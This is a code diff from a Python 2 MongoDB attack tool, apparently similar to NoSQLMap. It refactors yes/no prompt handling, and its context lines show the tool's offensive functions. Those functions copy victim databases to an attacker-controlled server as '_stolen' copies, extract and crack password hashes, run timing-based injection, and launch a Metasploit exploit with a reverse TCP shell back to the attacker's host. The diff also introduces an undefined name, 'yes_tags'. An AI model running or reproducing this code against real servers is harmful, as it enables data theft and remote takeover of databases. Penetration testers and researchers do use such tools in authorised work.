3535#Set a list so we can track whether options are set or not to avoid resetting them in subsequent cals to the options menu.
3636global optionSet
3737optionSet = [False ,False ,False ,False ,False ,False ,False ,False ]
38+ global yes_tag
39+ global no_tag
40+ yes_tag = ['y' , 'Y' ]
41+ no_tag = ['n' , 'N' ]
3842global victim
3943global webPort
4044global uri
@@ -373,7 +377,7 @@ def netAttacks(target):
373377
374378 srvNeedCreds = raw_input ("Does the database server need credentials (y/n)? " )
375379
376- if srvNeedCreds == "n" or srvNeedCreds == "N" :
380+ if srvNeedCreds in no_tag :
377381
378382 try :
379383 conn = pymongo .MongoClient (target ,dbPort )
@@ -383,7 +387,7 @@ def netAttacks(target):
383387 except :
384388 print "MongoDB port closed."
385389
386- elif srvNeedCreds == "y" or srvNeedCreds == "Y" :
390+ elif srvNeedCreds in yes_tag :
387391 srvUser = raw_input ("Enter server username: " )
388392 srvPass = raw_input ("Enter server password: " )
389393 uri = "mongodb://" + srvUser + ":" + srvPass + "@" + victim + "/"
@@ -406,7 +410,7 @@ def netAttacks(target):
406410 print "MongoDB web management open at " + mgtUrl + ". No authentication required!"
407411 testRest = raw_input ("Start tests for REST Interface (y/n)? " )
408412
409- if testRest == "y" or testRest == "Y" :
413+ if testRest in yes_tag :
410414 restUrl = mgtUrl + "/listDatabases?text=1"
411415 restResp = urllib .urlopen (restUrl ).read ()
412416 restOn = restResp .find ('REST is not enabled.' )
@@ -471,7 +475,7 @@ def netAttacks(target):
471475 print "\n "
472476 crack = raw_input ("Crack this hash (y/n)? " )
473477
474- if crack == "y" :
478+ if crack in yes_tag :
475479 brute_pass (users [x ]['user' ],users [x ]['pwd' ])
476480
477481 except :
@@ -482,7 +486,7 @@ def netAttacks(target):
482486
483487 testGrid = raw_input ("Check for GridFS (y/n)? " )
484488
485- if testGrid == "y" or testGrid == "Y" :
489+ if testGrid in yes_tag :
486490 try :
487491 for dbItem in dbList :
488492 try :
@@ -500,12 +504,12 @@ def netAttacks(target):
500504
501505 stealDB = raw_input ("Steal a database (y/n-Requires your own Mongo server)?: " )
502506
503- if stealDB == "y" or stealDB == "Y" :
507+ if stealDB in yes_tag :
504508 stealDBs (myIP )
505509
506510 getShell = raw_input ("Try to get a shell? (y/n-Requrires mongoDB <2.2.4)? " )
507511
508- if getShell == "y" or getShell == "Y" :
512+ if getShell in yes_tag :
509513 #Launch Metasploit exploit
510514 try :
511515 proc = subprocess .call ("msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str (victim ) + " DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str (myIP ) + " LPORT=" + str (myPort ) + " E" , shell = True )
@@ -783,7 +787,7 @@ def postApps():
783787
784788 fileOut = raw_input ("Save results to file (y/n)? " )
785789
786- if fileOut == "y" or fileOut == "Y" :
790+ if fileOut in yes_tag :
787791 savePath = raw_input ("Enter output file name: " )
788792 fo = open (savePath , "wb" )
789793 fo .write ("Vulnerable Requests:\n " )
@@ -964,7 +968,7 @@ def getApps():
964968 print "\n "
965969 doTimeAttack = raw_input ("Start timing based tests (y/n)? " )
966970
967- if doTimeAttack == "y" or doTimeAttack == "Y" :
971+ if doTimeAttack in yes_tags :
968972 print "Starting Javascript string escape time based injection..."
969973 start = time .time ()
970974 strTimeInj = urllib .urlopen (uriArray [8 ])
@@ -1004,7 +1008,7 @@ def getApps():
10041008 if lt24 == True :
10051009 bfInfo = raw_input ("MongoDB < 2.4 detected. Start brute forcing database info (y/n)? " )
10061010
1007- if bfInfo == "y" or bfInfo == "Y" :
1011+ if bfInfo in yes_tag :
10081012 getDBInfo ()
10091013
10101014
@@ -1028,7 +1032,7 @@ def getApps():
10281032
10291033 fileOut = raw_input ("Save results to file (y/n)? " )
10301034
1031- if fileOut == "y" or fileOut == "Y" :
1035+ if fileOut in yes_tag :
10321036 savePath = raw_input ("Enter output file name: " )
10331037 fo = open (savePath , "wb" )
10341038 fo .write ("Vulnerable URLs:\n " )
@@ -1287,15 +1291,15 @@ def stealDBs(myDB):
12871291 #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance.
12881292 dbNeedCreds = raw_input ("Does this database require credentials (y/n)? " )
12891293
1290- if dbNeedCreds == "n" or dbNeedCreds == "N" :
1294+ if dbNeedCreds in no_tag :
12911295 if optionSet [4 ] == False :
12921296 raw_input ("No IP specified to copy to! Press enter to return to main menu..." )
12931297 return
12941298
12951299 myDBConn = pymongo .MongoClient (myDB ,27017 )
12961300 myDBConn .copy_database (dbList [int (dbLoot )- 1 ],dbList [int (dbLoot )- 1 ] + "_stolen" ,victim )
12971301
1298- elif dbNeedCreds == "y" or dbNeedCreds == "Y" :
1302+ elif dbNeedCreds in yes_tag :
12991303 dbUser = raw_input ("Enter database username: " )
13001304 dbPass = raw_input ("Enter database password: " )
13011305 myDBConn .copy_database (dbList [int (dbLoot )- 1 ],dbList [int (dbLoot )- 1 ] + "_stolen" ,victim ,dbUser ,dbPass )
@@ -1306,7 +1310,7 @@ def stealDBs(myDB):
13061310
13071311 cloneAnother = raw_input ("Database cloned. Copy another (y/n)? " )
13081312
1309- if cloneAnother == "y" or cloneAnother == "Y" :
1313+ if cloneAnother in yes_tag :
13101314 stealDBs (myDB )
13111315
13121316 else :
@@ -1491,7 +1495,7 @@ def getDBInfo():
14911495
14921496 getUserInf = raw_input ("Get database users and password hashes (y/n)? " )
14931497
1494- if getUserInf == "y" or getUserInf == "Y" :
1498+ if getUserInf in yes_tag :
14951499 charCounter = 0
14961500 nameCounter = 0
14971501 #find the total number of users on the database
@@ -1627,7 +1631,7 @@ def getDBInfo():
16271631 pwdHash = ""
16281632 crackHash = raw_input ("Crack recovered hashes (y/n)?: " )
16291633
1630- while crackHash == "y" or crackHash == "Y" :
1634+ while crackHash in yes_tag :
16311635 menuItem = 1
16321636 for user in users :
16331637 print str (menuItem ) + "-" + user
0 commit comments